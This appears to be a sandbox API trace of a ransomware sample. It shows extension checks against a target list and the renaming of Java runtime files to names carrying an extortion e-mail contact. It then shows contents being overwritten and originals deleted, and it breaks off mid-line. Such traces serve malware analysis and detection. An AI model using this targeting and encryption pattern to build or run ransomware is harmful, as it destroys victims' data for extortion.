[0197.403] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll") returned 51 [0197.403] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll") returned 51 [0197.403] lstrlenW (lpString=".doc") returned 4 [0197.403] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.403] lstrlenW (lpString=".docx") returned 5 [0197.403] lstrcmpiW (lpString1=".docx", lpString2="a.dll") returned -1 [0197.403] lstrlenW (lpString=".pdf") returned 4 [0197.403] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.403] lstrlenW (lpString=".xls") returned 4 [0197.403] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.403] lstrlenW (lpString=".xlsx") returned 5 [0197.403] lstrcmpiW (lpString1=".xlsx", lpString2="a.dll") returned -1 [0197.403] lstrlenW (lpString=".ppt") returned 4 [0197.403] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.403] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll") returned 51 [0197.403] lstrlenW (lpString=".zip") returned 4 [0197.403] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.403] lstrlenW (lpString=".rar") returned 4 [0197.403] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.403] lstrlenW (lpString=".bz2") returned 4 [0197.403] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.403] lstrlenW (lpString=".7z") returned 3 [0197.403] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.403] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll") returned 51 [0197.403] lstrlenW (lpString=".dbf") returned 4 [0197.403] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.404] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll") returned 51 [0197.404] lstrlenW (lpString=".1cd") returned 4 [0197.404] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.404] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxmedia.dll") returned 51 [0197.404] lstrlenW (lpString=".jpg") returned 4 [0197.404] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.404] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0197.404] lstrlenW (lpString="jfxwebkit.dll") returned 13 [0197.404] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxwebkit.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0197.404] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=41503296) returned 1 [0197.404] CloseHandle (hObject=0x378) returned 1 [0197.404] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxwebkit.dll")) returned 0x20 [0197.405] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxwebkit.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.405] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxwebkit.dll"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxwebkit.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 1 [0197.405] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxwebkit.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0197.405] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc64 | out: lpNewFilePointer=0x0) returned 1 [0197.406] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc24 | out: lpNewFilePointer=0x0) returned 1 [0197.406] ReadFile (in: hFile=0x378, lpBuffer=0x415e058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc30, lpOverlapped=0x0 | out: lpBuffer=0x415e058*, lpNumberOfBytesRead=0x375fc30*=0x40000, lpOverlapped=0x0) returned 1 [0197.795] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0xd318c0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc24 | out: lpNewFilePointer=0x0) returned 1 [0197.795] ReadFile (in: hFile=0x378, lpBuffer=0x419e058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc30, lpOverlapped=0x0 | out: lpBuffer=0x419e058*, lpNumberOfBytesRead=0x375fc30*=0x40000, lpOverlapped=0x0) returned 1 [0197.910] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x375fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0197.910] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x2754a40, lpNewFilePointer=0x0, dwMoveMethod=0x375fc24 | out: lpNewFilePointer=0x0) returned 1 [0197.910] ReadFile (in: hFile=0x378, lpBuffer=0x41de058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc30, lpOverlapped=0x0 | out: lpBuffer=0x41de058*, lpNumberOfBytesRead=0x375fc30*=0x40000, lpOverlapped=0x0) returned 1 [0197.971] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.971] WriteFile (in: hFile=0x378, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xc0106, lpNumberOfBytesWritten=0x375fca8, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fca8*=0xc0106, lpOverlapped=0x0) returned 1 [0198.206] SetEndOfFile (hFile=0x378) returned 1 [0198.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40000) returned 0x44250b0 [0198.214] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc74 | out: lpNewFilePointer=0x0) returned 1 [0198.215] WriteFile (in: hFile=0x378, lpBuffer=0x44250b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc80, lpOverlapped=0x0 | out: lpBuffer=0x44250b0*, lpNumberOfBytesWritten=0x375fc80*=0x40000, lpOverlapped=0x0) returned 1 [0198.215] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0xd318c0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc74 | out: lpNewFilePointer=0x0) returned 1 [0198.216] WriteFile (in: hFile=0x378, lpBuffer=0x44250b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc80, lpOverlapped=0x0 | out: lpBuffer=0x44250b0*, lpNumberOfBytesWritten=0x375fc80*=0x40000, lpOverlapped=0x0) returned 1 [0198.216] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x2754a40, lpNewFilePointer=0x0, dwMoveMethod=0x375fc74 | out: lpNewFilePointer=0x0) returned 1 [0198.216] WriteFile (in: hFile=0x378, lpBuffer=0x44250b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc80, lpOverlapped=0x0 | out: lpBuffer=0x44250b0*, lpNumberOfBytesWritten=0x375fc80*=0x40000, lpOverlapped=0x0) returned 1 [0198.219] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0198.221] CloseHandle (hObject=0x378) returned 1 [0198.221] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0198.222] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll") returned 52 [0198.222] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll") returned 52 [0198.222] lstrlenW (lpString=".doc") returned 4 [0198.222] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0198.222] lstrlenW (lpString=".docx") returned 5 [0198.222] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0198.222] lstrlenW (lpString=".pdf") returned 4 [0198.222] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0198.222] lstrlenW (lpString=".xls") returned 4 [0198.222] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0198.222] lstrlenW (lpString=".xlsx") returned 5 [0198.222] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0198.222] lstrlenW (lpString=".ppt") returned 4 [0198.222] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0198.222] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll") returned 52 [0198.222] lstrlenW (lpString=".zip") returned 4 [0198.222] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0198.222] lstrlenW (lpString=".rar") returned 4 [0198.222] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0198.222] lstrlenW (lpString=".bz2") returned 4 [0198.222] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0198.222] lstrlenW (lpString=".7z") returned 3 [0198.222] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0198.222] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll") returned 52 [0198.223] lstrlenW (lpString=".dbf") returned 4 [0198.223] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0198.223] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll") returned 52 [0198.223] lstrlenW (lpString=".1cd") returned 4 [0198.223] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0198.223] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll") returned 52 [0198.223] lstrlenW (lpString=".jpg") returned 4 [0198.223] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0198.223] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll") returned 52 [0198.223] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll") returned 52 [0198.223] lstrlenW (lpString=".doc") returned 4 [0198.223] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0198.223] lstrlenW (lpString=".docx") returned 5 [0198.223] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0198.223] lstrlenW (lpString=".pdf") returned 4 [0198.223] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0198.223] lstrlenW (lpString=".xls") returned 4 [0198.223] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0198.223] lstrlenW (lpString=".xlsx") returned 5 [0198.223] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0198.223] lstrlenW (lpString=".ppt") returned 4 [0198.223] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0198.223] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll") returned 52 [0198.223] lstrlenW (lpString=".zip") returned 4 [0198.223] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0198.223] lstrlenW (lpString=".rar") returned 4 [0198.223] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0198.223] lstrlenW (lpString=".bz2") returned 4 [0198.223] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0198.224] lstrlenW (lpString=".7z") returned 3 [0198.224] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0198.224] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll") returned 52 [0198.224] lstrlenW (lpString=".dbf") returned 4 [0198.224] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0198.224] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll") returned 52 [0198.224] lstrlenW (lpString=".1cd") returned 4 [0198.224] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0198.224] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll") returned 52 [0198.224] lstrlenW (lpString=".jpg") returned 4 [0198.224] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0198.224] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0198.224] lstrlenW (lpString="msvcr120.dll") returned 12 [0198.224] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr120.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0198.225] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=963232) returned 1 [0198.225] CloseHandle (hObject=0x378) returned 1 [0198.225] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr120.dll")) returned 0x20 [0198.225] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr120.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0198.225] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr120.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0198.225] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.225] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.225] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr120.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0198.226] GetLastError () returned 0x0 [0198.226] ReadFile (in: hFile=0x378, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0xeb2a0, lpOverlapped=0x0) returned 1 [0198.421] WriteFile (in: hFile=0x368, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xeb2b0, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xeb2b0, lpOverlapped=0x0) returned 1 [0198.435] ReadFile (in: hFile=0x378, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.435] WriteFile (in: hFile=0x368, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.435] SetEndOfFile (hFile=0x368) returned 1 [0198.435] CloseHandle (hObject=0x368) returned 1 [0198.435] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.435] SetEndOfFile (hFile=0x378) returned 1 [0198.679] CloseHandle (hObject=0x378) returned 1 [0198.679] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0199.464] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr120.dll")) returned 1 [0199.464] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll") returned 51 [0199.464] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll") returned 51 [0199.464] lstrlenW (lpString=".doc") returned 4 [0199.464] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0199.464] lstrlenW (lpString=".docx") returned 5 [0199.464] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0199.464] lstrlenW (lpString=".pdf") returned 4 [0199.464] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0199.464] lstrlenW (lpString=".xls") returned 4 [0199.464] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0199.464] lstrlenW (lpString=".xlsx") returned 5 [0199.464] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0199.464] lstrlenW (lpString=".ppt") returned 4 [0199.464] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0199.464] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll") returned 51 [0199.465] lstrlenW (lpString=".zip") returned 4 [0199.465] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0199.465] lstrlenW (lpString=".rar") returned 4 [0199.465] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0199.465] lstrlenW (lpString=".bz2") returned 4 [0199.465] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0199.465] lstrlenW (lpString=".7z") returned 3 [0199.465] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0199.465] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll") returned 51 [0199.465] lstrlenW (lpString=".dbf") returned 4 [0199.465] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0199.465] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll") returned 51 [0199.465] lstrlenW (lpString=".1cd") returned 4 [0199.465] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0199.465] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll") returned 51 [0199.465] lstrlenW (lpString=".jpg") returned 4 [0199.465] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0199.465] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll") returned 51 [0199.465] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll") returned 51 [0199.465] lstrlenW (lpString=".doc") returned 4 [0199.465] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0199.465] lstrlenW (lpString=".docx") returned 5 [0199.465] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0199.465] lstrlenW (lpString=".pdf") returned 4 [0199.465] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0199.465] lstrlenW (lpString=".xls") returned 4 [0199.465] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0199.465] lstrlenW (lpString=".xlsx") returned 5 [0199.465] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0199.465] lstrlenW (lpString=".ppt") returned 4 [0199.465] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0199.465] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll") returned 51 [0199.466] lstrlenW (lpString=".zip") returned 4 [0199.466] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0199.466] lstrlenW (lpString=".rar") returned 4 [0199.466] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0199.466] lstrlenW (lpString=".bz2") returned 4 [0199.466] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0199.466] lstrlenW (lpString=".7z") returned 3 [0199.466] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0199.466] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll") returned 51 [0199.466] lstrlenW (lpString=".dbf") returned 4 [0199.466] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0199.466] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll") returned 51 [0199.466] lstrlenW (lpString=".1cd") returned 4 [0199.466] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0199.466] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll") returned 51 [0199.466] lstrlenW (lpString=".jpg") returned 4 [0199.466] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0199.466] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0199.466] lstrlenW (lpString="ssvagent.exe") returned 12 [0199.466] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssvagent.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0199.467] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=70208) returned 1 [0199.467] CloseHandle (hObject=0x344) returned 1 [0199.467] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssvagent.exe")) returned 0x20 [0199.467] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssvagent.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0199.467] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssvagent.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0199.467] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.467] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.467] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssvagent.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0199.468] GetLastError () returned 0x0 [0199.468] ReadFile (in: hFile=0x344, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x11240, lpOverlapped=0x0) returned 1 [0199.472] WriteFile (in: hFile=0x330, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x11250, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x11250, lpOverlapped=0x0) returned 1 [0199.474] ReadFile (in: hFile=0x344, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.474] WriteFile (in: hFile=0x330, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.474] SetEndOfFile (hFile=0x330) returned 1 [0199.475] CloseHandle (hObject=0x330) returned 1 [0199.475] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.475] SetEndOfFile (hFile=0x344) returned 1 [0199.476] CloseHandle (hObject=0x344) returned 1 [0199.476] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0199.476] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssvagent.exe")) returned 1 [0199.476] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe") returned 51 [0199.476] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe") returned 51 [0199.476] lstrlenW (lpString=".doc") returned 4 [0199.476] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0199.476] lstrlenW (lpString=".docx") returned 5 [0199.476] lstrcmpiW (lpString1=".docx", lpString2="t.exe") returned -1 [0199.476] lstrlenW (lpString=".pdf") returned 4 [0199.476] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0199.476] lstrlenW (lpString=".xls") returned 4 [0199.477] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0199.477] lstrlenW (lpString=".xlsx") returned 5 [0199.477] lstrcmpiW (lpString1=".xlsx", lpString2="t.exe") returned -1 [0199.477] lstrlenW (lpString=".ppt") returned 4 [0199.477] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0199.477] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe") returned 51 [0199.477] lstrlenW (lpString=".zip") returned 4 [0199.477] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0199.477] lstrlenW (lpString=".rar") returned 4 [0199.477] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0199.477] lstrlenW (lpString=".bz2") returned 4 [0199.477] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0199.477] lstrlenW (lpString=".7z") returned 3 [0199.477] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0199.477] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe") returned 51 [0199.477] lstrlenW (lpString=".dbf") returned 4 [0199.477] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0199.477] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe") returned 51 [0199.477] lstrlenW (lpString=".1cd") returned 4 [0199.477] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0199.477] lstrlenW (lpString="C:\\Program 